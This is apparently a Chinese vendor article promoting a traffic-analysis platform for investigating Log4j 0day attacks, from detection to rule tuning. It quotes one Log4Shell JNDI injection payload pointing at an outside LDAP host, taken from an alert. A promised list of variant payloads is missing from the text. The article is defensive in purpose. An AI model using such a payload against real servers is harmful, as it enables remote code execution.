「神剑攻防演练宝典」之0day漏洞攻击调查

以响应log4j 漏洞攻击为例，实践证明，象守全流量安全计算分析平台可高效的从多角度实现调查、检测、阻断等功能动作，助力企业从容应对0day攻击。

第一阶段——快速响应。本阶段往往还没有相关的漏洞详情公开，颇有“山雨欲来风满楼”之味。依托于象守强大的分布式流量探针，可对大流量进行高效解析，帮助企业捕获流量中的蛛丝马迹。

在象守上出现风险告警，发现攻击payload “${jndi:ldap://ad577be4.dns.1433.eu.org}”的DNS请求告警，根据风险详情，快速追踪DNS请求IP，判定为0Day漏洞Log4j攻击成功，并快速输出漏洞利用点。

象守提供的风险详情面板模块，支持查看风险相关网络会话、攻击特征、请求/响应包等原始凭据，支撑风险事件定量分析。而后跳转到数据湖查看请求的协议日志详情，甚至下载原始流量凭证进行深度分析。由此快速掌握有效证据并完成风险事件的精准判定。最后，使用HTTP协议监测模型，针对 HTTP 协议相关字段，创建“Log4j监测”规则对攻击特征的监测覆盖，即可实现快速规则添加，满足检测需求。

第二阶段——深剖与巩固。这一阶段，往往已经获取到了一部分攻击特征，但依然有问题需要解决。如：攻击者从何时开始使用0day漏洞攻击？资产设备是否受到影响甚至已经失陷？此时长周期数据存储便派上用场了，所谓“来者犹可追”，即使攻击事件已经发生，通过对历史流量数据的深入分析，可以迅速知晓攻击影响面并发起响应。

象守综合风险信息中确认的Log4j 漏洞攻击成功，并输出存在漏洞利用成功的路径和对象，强化攻击画像，高效还原攻击过程。象守使用“时间范围”与“IP范围”联系DNS请求内容，跨协议复合查询 HTTP 和 TCP 的URL、Request_body，找到所有命中域名以及对外请求恶意的源IP之间的访问关系，快速定位受影响失陷对象；当排查到攻击者IP或者受害资产IP时，可以分别从HTTP，IPFIX，DNS，SSL这四个协议入手进行排查，发现攻击者IP或者受害资产IP更多的相关流量。

在风险事件研判后，需要使用到协议分析、调查画布、攻击者画像功能找出攻击路径及影响面，再利用攻击离线检测模型验证攻击有效性，最大程度的降低误报。

从不同协议层次分析网络建联关系、通信活跃度、流量趋势、请求频次及查询状态，从而调查主机存在的其它表征活动，完成风险事件定性评价；

于大数据图谱分析技术，能够清晰展示实体间访问关系。运营人员将风险事件中IP、URL等IoC信标作为调查对象，通过全局视角的下钻探索，可快速掌握多次攻击所产生的影响面；还可对任意节点进行拓展分析，从而找出其它攻击线索；

描绘了所有风险事件相关的攻击者身份画像，能够帮助防守方掌握攻击者常用攻击工具、攻击偏好目标、活跃时间信息，从而对攻击者进行差异化处置响应；结合攻击者画像详情，可以直观了解到攻击者在一段时间内的攻击路径；

根据模型可实现全时段的长周期历史数据的全面回溯，有效验证规则的有效性。当使用Log4j 漏洞的初期特征作为规则上线时，很容易触发大量告警，导致风险列表被海量事件淹没。通过此功能模块，可以实现对最大化压缩误报率，保证规则上线前的准确度。此外，用户的IPS设备亦需要较高的规则准确度以确保不因过度封禁影响业务，更需要使用本功能进行规则测试。

第三阶段——强化对抗。这一阶段，随着Log4j 攻击细节披露，会发现越来越多的扫描行为，而且攻击绕过的方法千变万化。自当是“他强由他强，清风拂山冈”。安全专家需根据其变形方法，快速进行策略升级，将未来攻击挡于门外。

象守的安全专家已从流量数据发现log4j 的变形攻击payload 示例如下：

从源码层面进行版本代码对比分析，梳理攻击链，并构建可能绕过手段，目前象守已更新针对Log4j漏洞的检测策略。得益于象守云端中心高效的规则一体化，最新策略规则可以达到小时级响应升级。Log4j 事件期间已进行多次优化升级，无障碍提升检测能力。